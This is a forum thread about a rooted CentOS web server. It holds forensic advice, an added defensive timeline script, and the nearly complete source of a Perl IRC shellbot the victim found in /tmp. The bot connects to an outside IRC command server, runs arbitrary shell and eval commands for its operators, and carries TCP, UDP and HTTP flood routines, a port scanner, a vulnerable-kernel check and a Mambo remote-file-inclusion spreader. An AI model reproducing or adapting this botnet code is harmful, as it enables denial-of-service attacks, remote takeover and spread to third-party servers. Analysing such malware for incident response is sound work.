I've been rooted

Support for security such as firewalls and securing Linux
falcon1620
Posts: 22
Joined: 2009/06/29 19:23:16

I've been rooted

Post by falcon1620 » 2010/10/18 15:40:21

So I have a little box downstairs that runs Apache and web services for development work, mainly PHP and some Perl, where a few other students can stick some code. Today, however, I noticed that there were a bunch of deprecated Perl threads running, and a bunch of Perl processes forking in my chrooted Apache environment. :lol: Not to mention that my casual 13% utilization was spiking to 100%.

So I got the chroot shut down, but I noticed that there were still Perl threads running under the Apache user (even with the service disabled and the chroot removed...) :-P Yes, Apache outside of the chroot... This box is OWNED!

My question to you is, is there a way to figure out what files are running on that box through the process list? I can't seem to find out where these malicious threads are executing from. I mean, I will re-do the machine, and I have removed some of the web server code that was exploited, but I'd like to poke around there in the future to prevent myself from being rooted. You know. When I run ps --aux or top it just shows these threads as "Perl" with no pathname... The Perl and Apache-owned threads keep appearing without the Apache service running... Maybe a cron job that would spawn these?

And yes, I have all of the latest updates, and am not only running my services in a chroot, but also have the default SELinux policies enabled. Just sometimes you get some code that is less than secure on the web server... Hence the additional security measures. I would think that even with an exploit, SELinux and chroot could contain the madness? Maybe that's just wishful thinking...

I know well that machine gets abused; occasionally I do get it updated.

Well that's a first for me LOL


:-D

I'm not a programmer, so forgive my ignorance here. I think it's funny that Perl on here was exploited. So, any suggestions? LOL :-D :-D :-D

Oh, I posted to Server Support instead of Security... Sorry

toracat
Site Admin
Posts: 7518
Joined: 2006/09/03 16:37:24
Location: California, US

I've been rooted

Post by toracat » 2010/10/18 16:36:00

Moved to the Security forum.

Are you sure your system was totally up-to-date? Are you running something that is not from the distro? If so, which software?

falcon1620
Posts: 22
Joined: 2009/06/29 19:23:16

Re: I've been rooted

Post by falcon1620 » 2010/10/18 18:31:22

Thanks for moving me... :-)

Yeah, I had a few web applications running on there that were not from the repo. They included:
-PHPMyAdmin (latest that would run under the CentOS PHP version)
-OSCommerce (latest)
-GLPI (latest)
-Midterm Appgate (free versions, but also up to date)
-WordPress (latest)
-phpBB (latest)
-Some coursework-level scripts in Perl and PHP, and some PHP and Perl framework engines for modules and templates; these were also protected by .htaccess

(As you can see I had a lot of web apps running, but I kept them all up to date, and would migrate them or remove them if I was done messing with them on my server.)

All of these were running on the web server at the time; however, each folder had a custom .htaccess file associated with it, and I would log in through the .htaccess using a self-generated, self-signed SSL cert. I rotated the SSL cert about once a week.

There were quite a few libraries installed on there, and it was a semi-bloated development environment.

In fact, after I killed some of the process threads, I ran an update on the box, and there were no updates to install. I have since shut the box down so that I can go unplug it from the network and look at it further. So there were no updates available; I usually let the machine update every day using yumcrond. I also disabled the HTTP server and it still was spawning process threads, even after they were all killed. I also noticed a lot of them outside of my chroot, but it could be that they were reporting those from the chroot, now that I think about it. Do top and ps display the chroot processes? I think so... I didn't really stay too long in there to find out. Just wanted to get it off my network quickly while I still had control over the box.

I had a personal web site on there that was all done in HTML and CSS.

The only really weak point in my security was that SquirrelMail had a Setbool * policy on it, but that was because I cannot for the life of me figure out why SquirrelMail gets denied when connecting to Dovecot's IMAP protocol on the local machine, and I didn't understand SELinux policies well enough to really do a good job locking it down... and I figured that I would rather just set Setbool * than disable SELinux on the entire machine. Could be where they slipped past, but it's hard to say... I had been running the box this way for quite some time without an issue. I removed all of the web applications on there and the Perl would still execute on the processor, so it was pretty much owned. Thought it was a prank or something, but my friend noticed last night that the performance on the box was pretty sad and had said something about it last night.

Services running were:
-MySQL
-Apache
-Mod_Perl
-Mod_PHP
-Mod_Auth
-SquirrelMail
-SSH Server
-Dovecot
-Sendmail

Ports open to the world:
22, 80, 443, that's it. Each database connection was local, same with IMAP and Sendmail; they were internal only, no external access except through SSH tunnelling.

I have root access to the SSH server disabled as well. So even if they did get into the SSH server via brute force, there are really not a lot of permissions on those accounts. I also have the box behind a pfSense firewall that has IDS tools on there; hopefully they would have gone off if that was the case. I checked the logs and there are only the usual brute force attacks from script kiddies on port 22, which are blocked within 10 attempts. They also usually target root, and that is entirely disabled.

So I don't know, that's a first for me... Do you see anything in here that would be of concern? It's hard to speculate why my chroot would have failed with SELinux... But it would not be the first time I had an error in my configuration. I have quite a few CentOS boxes running out there, even with older versions of web applications chugging away. Can't say that I was ever rooted with them.

I would have poked around more, but I am not near the physical box, and I also noticed that Perl threads kept spawning outside of the chroot owned by apache, and neither was the Apache service enabled or started, nor was mod_perl installed after that, and neither should be active outside of the chroot. And you only have so much time before they start eating away at the system resources again.

I would suspect that someone exploited one of these services on the web server. That's where I am going to look once I get a forensics partition with the exploited server set up. My concern is them getting past the IDS, SELinux, and the chroot with all of those updates on there. I did a quick rm -rf on the web root directory (since it's all backed up anyway) to see if any of those files were containing anything malicious. Once the service was disabled, the web directory wiped, and the box rebooted, it still had renegade threads starting in my process tree. I double checked, and Apache was disabled; Mod_PHP and Mod_Perl were disabled in the configuration as well.

:-D
Aside from throwing up some development PHP and Perl code under a password-protected folder, there should not be too many gaping security holes in there that I notice. If that's the case, oh man, I have a lot of configuration changes to go through for about 20 live-facing servers here. :-o

I know that /temp is a popular place to start for exploit code, but where else would people like to hide stuff on your box? Especially confusing is that each thread process that is forking is loaded up as "Perl" and "Apache" with no pathname on there, making it hard to find. I don't really ever have to deal with these types of issues.
That's about as much background as I can give you there without booting the machine back up to take a look, which I can do when I get home to it. :-P

:-D

unspawn
Posts: 172
Joined: 2006/12/11 12:28:52

Re: I've been rooted

Post by unspawn » 2010/10/18 22:04:55

[quote]falcon1620 wrote:
Does top and PS display the chroot processes (..) is there a way to figure out what files are running on that box through the process list?[/quote]
Running '/usr/sbin/lsof -Pwln' could be a start, however that would require you to (unplug the network! and) resurrect the machine. Before you do, please first boot a Live CD like the CentOS installer CD or HELIX or KNOPPIX, mount partitions read-only and back up all of /etc, /tmp, /var, /root and /home for investigative purposes.


[quote]falcon1620 wrote:
When I run ps --aux or Top it just executes these threads as "Perl" with no pathname... The Perl and Apache owner threads keep appearing with out apache service running... Maybe a chron that would spawn these?[/quote]
Sure. For instance, if an attacker (by any means) can execute a system command like 'crontab -u httpd /path/to/httpd-writable/directory/filename' it will cause the httpd user's crontab to be replaced. Then if user httpd is not in /etc/cron.deny the crontab will be run.


[quote]falcon1620 wrote:
I know that /temp is a popular place to start for exploit code, but where else would people like to hid stuff on your box? [/quote]
This question invites speculation. I'd rather review facts.
- On a (physically different) workstation expand all logs and run them through 'logwatch' (--range All --archives) to find leads. Be especially interested in HTTP requests that contain [?,&]arguments and %20command%20names.
- If you ran a file system integrity checker like Samhain or Aide now would be the time to put it to use.
- With the Live CD booted run 'rpm /path/to/mounted/victim/var/lib/rpm --root /path/to/mounted/victim/ -qa --dump > /livecd/tmp/rpmdb.log' to create a list of all files known to the RPMDB.
- With the Live CD booted run 'find /path/to/mounted/victim -print0|xargs -0 -iX stat -c '%y %u %g %a #%n' 'X'|sort -k 1,2 > /livecd/tmp/timeline.log' to gather a list of all files sorted by last modification date.
- With the Live CD booted run 'last -f /path/to/mounted/victim/var/log/wtmp' and save the output. Same for /path/to/mounted/victim/var/log/lastb.
- Inspect /path/to/mounted/victim/var/log/cron or whatever /etc/syslog.conf reported cron activity to.
- Inspect /path/to/mounted/victim/etc/{passwd, group} for "strange" user accounts.
- Save all reports and logs to your workstation.
- Running 'cat /livecd/tmp/timeline.log|cut -d '#' -f 2-' produces a list of all files. Running 'cat rpmdb.log| cut -d ' ' -f 1' produces a list of all files known to the RPMDB. List 1 minus list 2 is all files that are not known to the RPMDB. These will contain files installed from tarball, stray false positives from packages, logrotated files and user-injected files.
Any leads from the logwatch report and user-injected non-RPMDB files you should find in the timeline.log. Files created in directories writable by human users in /home, files written to in httpd-user-writable directories, /tmp, /var/tmp and /root are suspect as are files matching or having a close by modification time.
- Review the files you have (backed up and) deleted for matching timestamps.
* Have a look at the [url=http://web.archive.org/web/20080109214340/http://www.cert.org/tech_tips/intruder_detection_checklist.html]CERT Intruder Detection Checklist[/url]. It's old but always a good checklist.

If what you have to report exceeds this forums max post size please consider hosting a tarball or files, using pastebin or docs.google.
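The file-system part of the procedure above (timeline of every file via find/stat, the RPM-DB dump, list 1 minus list 2), put together as a runnable script. This is an added example, not code from the thread or from CentOS. It assumes GNU find, stat, sort, comm and date (all on a CentOS Live CD); the victim tree and the rpm dump excerpt it works on are constructed here so it runs offline, with the current user standing in for the apache uid. On a real case $VICTIM is the read-only mount and the dump comes from 'rpm --root $VICTIM -qa --dump'. It goes one step beyond the post: owned_in_window answers the follow-up question that comes later in the thread (files owned by one uid modified inside a date window).

```bash
#!/bin/bash
# Added example (not from the thread): offline timeline and "not known to the
# RPM DB" list over a mounted victim root, following unspawn's procedure.

# build_timeline ROOT OUT: one line per file, "epoch uid gid mode date #path",
# sorted oldest first, so the most recent changes are at the bottom.
build_timeline() {
    local root=$1 out=$2
    find "$root" -print0 \
        | xargs -0 stat -c '%Y %u %g %a %y #%n' \
        | sort -n -k1,1 > "$out"
}

# unknown_files ROOT TIMELINE RPMDUMP: paths in the timeline (made relative to
# ROOT) that are absent from the dump, whose first field is the package path.
# What is left is tarball installs, logrotated files and attacker drops to review.
unknown_files() {
    local root=$1 timeline=$2 rpmdump=$3
    local known listed
    known=$(mktemp); listed=$(mktemp)
    awk '{print $1}' "$rpmdump" | sort -u > "$known"
    cut -d '#' -f 2- "$timeline" | sed "s|^$root||; /^$/d" | sort -u > "$listed"
    comm -23 "$listed" "$known"
    rm -f "$known" "$listed"
}

# owned_in_window TIMELINE UID START END: files owned by UID whose mtime lies
# between START and END ('YYYY-MM-DD HH:MM:SS'), e.g. apache between Oct 15 and 18.
owned_in_window() {
    local timeline=$1 uid=$2 start end
    start=$(date -d "$3" +%s); end=$(date -d "$4" +%s)
    awk -v u="$uid" -v s="$start" -v e="$end" '
        { split($0, f, " "); p = substr($0, index($0, "#") + 1)
          if (f[2] == u && f[1] >= s && f[1] <= e) print p }' "$timeline"
}

# --- constructed victim tree: stands in for the read-only mount --------------
VICTIM=$(mktemp -d)
mkdir -p "$VICTIM/usr/bin" "$VICTIM/etc" "$VICTIM/tmp"
echo '#!/usr/bin/perl' > "$VICTIM/usr/bin/perl"              # package-owned file
echo 'root:x:0:0::/root:/bin/bash' > "$VICTIM/etc/passwd"     # package-owned config
echo '# constructed stand-in for the dropped bot' > "$VICTIM/tmp/iptraf"
touch -d '2009-05-01 10:00:00' "$VICTIM/usr/bin/perl" "$VICTIM/usr/bin" "$VICTIM/usr"
touch -d '2010-09-01 09:00:00' "$VICTIM/etc/passwd" "$VICTIM/etc"
touch -d '2010-10-17 15:33:44' "$VICTIM/tmp/iptraf" "$VICTIM/tmp"
touch -d '2009-05-01 10:00:00' "$VICTIM"

# --- constructed excerpt in the shape of 'rpm -qa --dump' ----------------------
# (path size mtime digest mode owner group isconfig isdoc rdev symlink)
RPMDUMP=$(mktemp)
cat > "$RPMDUMP" <<'EOF'
/usr 4096 1241172000 0000000000000000000000000000000000000000 040755 root root 0 0 0 X
/usr/bin 4096 1241172000 0000000000000000000000000000000000000000 040755 root root 0 0 0 X
/usr/bin/perl 16 1241172000 0000000000000000000000000000000000000000 0100755 root root 0 0 0 X
/etc 4096 1283331600 0000000000000000000000000000000000000000 040755 root root 0 0 0 X
/etc/passwd 28 1283331600 0000000000000000000000000000000000000000 0100644 root root 1 0 0 X
/tmp 4096 1241172000 0000000000000000000000000000000000000000 041777 root root 0 0 0 X
EOF

TIMELINE=$(mktemp)
build_timeline "$VICTIM" "$TIMELINE"
echo "== files not known to the RPM DB =="
unknown_files "$VICTIM" "$TIMELINE" "$RPMDUMP"
echo "== files owned by uid $(id -u), modified Oct 15-18 2010 =="
owned_in_window "$TIMELINE" "$(id -u)" '2010-10-15 00:00:00' '2010-10-18 23:59:59'
```

The timeline keys on mtime only, which an intruder can reset with touch; when you run it for real, add `%Z` (ctime) as a second column, since ctime cannot be set from user space, and sort on that as well.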

falcon1620
Posts: 22
Joined: 2009/06/29 19:23:16

Re: I've been rooted

Post by falcon1620 » 2010/10/19 21:30:44

I've made a backup of the hard drive with the Live CD, and also an image file, and decided to go poking around a bit. Found this in tmp; thought it was cute.
Well, that explains the Perl threads. Interestingly enough, they were spawning and sticking to about 78% CPU time on the box, so I'll have to go digging through the file system to see if I can in fact find out where some kind of manager process is running... I am going to go through the logs and chop them down a bit for interest. They did an alright job cleaning them up, but the last little bit that I caught before there was time to wipe it seemed to point to either a kernel exploit or through PHP (phpmyadmin), which I suspected. Well, at least now we all know what the password is to this botnet.

I should also add that I noticed SELinux was put into permissive mode, so maybe a friend disabled that, hopefully, and not the hacker here. I added some returns on the lines, and this is a Perl program; I removed the Perl header at the top (I know, whoot, that will stop it from executing...)


[code]
# This code is based on atrix (brazil) shellbot, somebody ripped all the credits, but its obviusly a rip.
# so the original author is atrix. the spread perl code was developed by sirhot (i am almost sure) he is from morocco.
# Note to David Jacoby: Expect a few improvements for the next release.
#
# The following comments are only left in the code to ridiculize this guy.
# --------------------------------------------------------------
# Morgan has hacked you!
# Morgan Argentina, santiago del estero
# http://irc.irc-argentina.org/x.conf
# http://img521.imageshack.us/img521/3779/morganlammer6tu.png
#
# oper morgan {
# class clients;
# from {
# userhost *@*;
# };
# password "soyuncapo"; // morgan si, eres-un-capo.
# oper morgan2 {
# class clients;
# from {
# userhost *@*;
# };
# password "thegod"; //morgan si, eres el-dios.
# -----------------------------------------------------------
my $processo = '/usr/sbin/httpd';

if (`ps uxw` =~ /usr\/bin\/web\/httpd/)

{

exit;

}

# morgan the code that you need to rip ends here

my $linas_max='4';
my $sleep='5';
my @adms=("anakin","DarthVader","nap","Sclipici");
my @hostauth=("fbi.gov","nasa.gov","evil.h-gov","lamer2k.tr","fsck.you");
my @canais=("#root");
my $nick='flood';
my $ircname ='flood';
chop (my $realname= 'flood');
$servidor='flood.cyberpunks.ro' unless $servidor;
my $porta='7000';
my $VERSAO ='0.5';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}

sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];

my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;

$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);

$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);

for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}

sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
}
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!x)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick|".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal");
rooting($canal);
}
}
}


sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665",
"6666","6667","6668","6669","7000","8080","8018");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}

if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
}
}
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
}
if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO);
}
if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched mambo for ".$1." seconds.");
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$boturl=$2;
$cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url =$path."/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&
mosConfig_absolute_path=$boturl?";
$page = http_query($url);
$exploited = $exploited + 1;
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");
}
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
}
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}
+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
}
exit;
}
}
}

sub ircase {
my ($kem, $printl, $case) = @_;

if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
if ($case =~ /^rooting/)
{
if(rooting($printl))
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Rooting]\002 Nothing rootable !!");
}
}

}

sub rooting {

my $printl=$_[0];
my $kern=`uname -a`;
if ($kern =~ /2.4.17\s/ || $kern =~ /2.4.18\s/ || $kern =~ /2.4.19\s/ || $kern =~ /2.4.20/ ||
$kern =~ /2.4.20-8/ || $kern =~ /2.4.21\s/ ||
$kern =~ /2.4.22\s/ || $kern =~ /2.4.22-10\s/ || $kern =~ /2.4.23\s/ || $kern =~ /2.4.24\s/ ||
$kern =~ /2.4.25-1\s/ || $kern =~ /2.4.26\s/ ||
$kern =~ /2.4.27\s/ || $kern =~ /2.6.2\s/ || $kern =~ /2.6.5\s/ || $kern =~ /2.6.6\s/ ||
$kern =~ /2.6.7\s/ || $kern =~ /2.6.8\s/ || $kern =~ /2.6.8-5\s/ ||
$kern =~ /2.6.9\s/ || $kern =~ /2.6.9-34\s/ || $kern =~ /2.6.10\s/ || $kern =~ /2.6.11/ ||
$kern =~ /2.6.13\s/ || $kern =~ /2.6.13-17/ || $kern =~ /2.6.14\s/ ||
$kern =~ /2.6.15\s/ || $kern =~ /2.6.16\s/)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Exploitable Kernel !!]\002 I m an exploitable Kernel: ".`uname -r`);
}
else
{
return 1;
}
return 0;
}



sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}

sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}

sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;

for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}

sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}

# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.
#

sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);

my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca",
"mx","pa","ni","cu","pr","ve","co","pe","ec",
"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt",
"ch","se","su","it","gr","al","dk","pl","biz","int","pro",
"museum",
"coop",
"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz",
"bj","bm","bt","by","ba","bw","bn" ,"bg","bf","bi",
"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf",
"ht","nl","hn","hk","hu","in","id ","ir",
"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg",
"vi","wf","il","jm","je","jo","kz ","ke",
"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr",
"mu","yt","md","mc","mn","ms" ,"mz","mm",
"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru",
"eh","kn","ws","as","sm","pm","vc",
"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr",
"tm","tv","ug","ua","uz",
"vu","vn","ye","yu","cd","zm","zw","");
my @str;

foreach $dom (@dominios)
{
push (@str,"%22by+mambo%22+site%3A".$dom."%20");
}

my $query="www.google.com/search?q=";
